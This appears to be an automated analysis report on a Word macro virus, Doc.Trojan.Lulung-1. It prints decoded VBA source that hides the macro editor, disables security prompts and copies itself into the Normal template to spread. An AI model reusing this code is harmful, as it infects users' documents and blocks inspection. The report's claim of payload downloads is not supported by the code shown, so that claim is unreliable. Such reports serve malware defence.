Doc.Trojan.Lulung-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 a2d9041e591d8275…

MALICIOUS

Office (OLE)

75.5 KB Created: 1999-11-16 21:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 01ab63e844f3a411dae2b1e89802eb65 SHA-1: 7e20859e5b4904d5008c0d4f47dcdcc38931a016 SHA-256: a2d9041e591d82756ff53eed2bab8520cd704b33ad4e0bc933ab5c322a2f63d1
220 Risk Score

Malware Insights

Doc.Trojan.Lulung-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Lulung-1. It contains legacy WordBasic macro markers and a VBA AutoOpen macro, indicating an attempt to execute code upon opening. The VBA macro appears to be designed to disable macro security features and potentially download and execute additional payloads, though the script is truncated.

Heuristics 4

  • ClamAV: Doc.Trojan.Lulung-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Lulung-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21929 bytes
SHA-256: c9f1bc0ab82a2f30d627e1d7ec1178637ad1f4a3c8873416834ed6fa4d87acd4
Detection
ClamAV: Doc.Trojan.Lulung-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ChenLung"
Attribute VB_Base = "0{758DA323-79D3-11CE-9209-8AE360A51863}{758DA31C-79D3-11CE-9209-8AE360A51863}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False






























Private Sub Image1_Click()
MsgBox "Don't Take My Food ! If You Want It, Ask To Your Mom !", vbOKOnly, "June 08, 1971"
End Sub

Private Sub Image2_Click()
MsgBox "Hei... Don't Click This Area !", vbOKOnly, "June 08, 1971"
End Sub

Private Sub OK_Click()
If Day(Now()) = 8 And Month(Now()) = 6 Then Call Jalan
Unload Me
End Sub

Sub Jalan()
Unload Me
umur = Year(Now()) - 1971
gua$ = "Today Is My Birthday... I'm Now " & umur & " Years Old. Thank's For Your Greeting !" & Chr$(13) & "© April, 1998 - By. June 08, 1971"
MsgBox gua$, vbOKOnly, "Happy Birthday To Me !"
StatusBar = "=> HAPPY Birthday to Me !"
End Sub

Attribute VB_Name = "LungChen"
'Welcome To My Listing Program !
'Created and Programmed By. June 8, 1971
'©April, 1998 - Ciputat
'Sorry, If my program disturbs you !
'It's not danger, I just want to be your friend !

Public Mulai
Public SimpanFile
Public Ay
Public Sun
Sub AyAlways()
    Mulai = Application.DisplayAlerts
    Application.DisplayAlerts = wdAlertsNone
    Call Cek
    WordBasic.DisableAutoMacros 0
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    On Error Resume Next
    CommandBars("Tools").Controls("Macro").Delete
    CustomizationContext = NormalTemplate
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    On Error GoTo 0
End Sub
Sub AyClose()
Application.DisplayAlerts = Mulai
End Sub
Sub AyBirthday()
If Day(Now()) = 8 And Month(Now()) = 6 Then ChenLung.Show
If Day(Now()) = 26 And Month(Now()) = 7 Then MsgBox "Today Is My Wife's Birthday. Happy Birthday Honey !", vbOKOnly, "Happy Birthday To My Wife"
If Day(Now()) = 8 And Month(Now()) = 2 Then MsgBox "Today Is My Wedding's Day. Thank's God !", vbOKOnly, "Happy Wedding"
End Sub
Sub Ay2()
    Call Cek
    On Error GoTo AyErr1
    Ay = False
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo Error1a
    For i = 1 To NT.VBProject.VBComponents.Count
      NMacr = NT.VBProject.VBComponents(i).Name
      If NMacr = "LungChen" Then Ay = True
      If (NMacr <> "LungChen") And (NMacr <> "ChenLung") And (NMacr <> "ThisDocument") Then
        Application.OrganizerDelete Source:=NT.FullName, _
            Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
Error1a:
    If Ay = False Then
      On Error GoTo Error1
      Application.OrganizerCopy Source:=AD.FullName, _
          Destination:=NT.FullName, Name:= _
          "LungChen", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=AD.FullName, _
          Destination:=NT.FullName, Name:= _
          "ChenLung", Object:=wdOrganizerObjectProjectItems
      Templates(NT.FullName).Save
Error1:
    End If
AyErr1:
End Sub
Sub Ay2Doc()
    On Error GoTo AyErr2
    SimpanFile = 0
    Sun = False
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo Error2a
    For i = 1 To AD.VBProject.VBComponents.Count
      NMacr = AD.VBProject.VBComponents(i).Name
      If NMacr = "LungChen" Then Sun = True
      NMacr = NT.VBProject.VBComponents(i).Name
      If NMacr = "LungChen" Then Sun = True
      If (NMacr <> "LungChen") And (NMacr <> "ChenLung") And _
        (NMacr <> "ThisDocument") And (NMacr <> "Reference to Normal") Then
        Application.OrganizerDelete Source:=AD.FullName, _
          Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
Error2a:
    If Sun = False Then
      On Error GoTo Error2
      Applicati
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.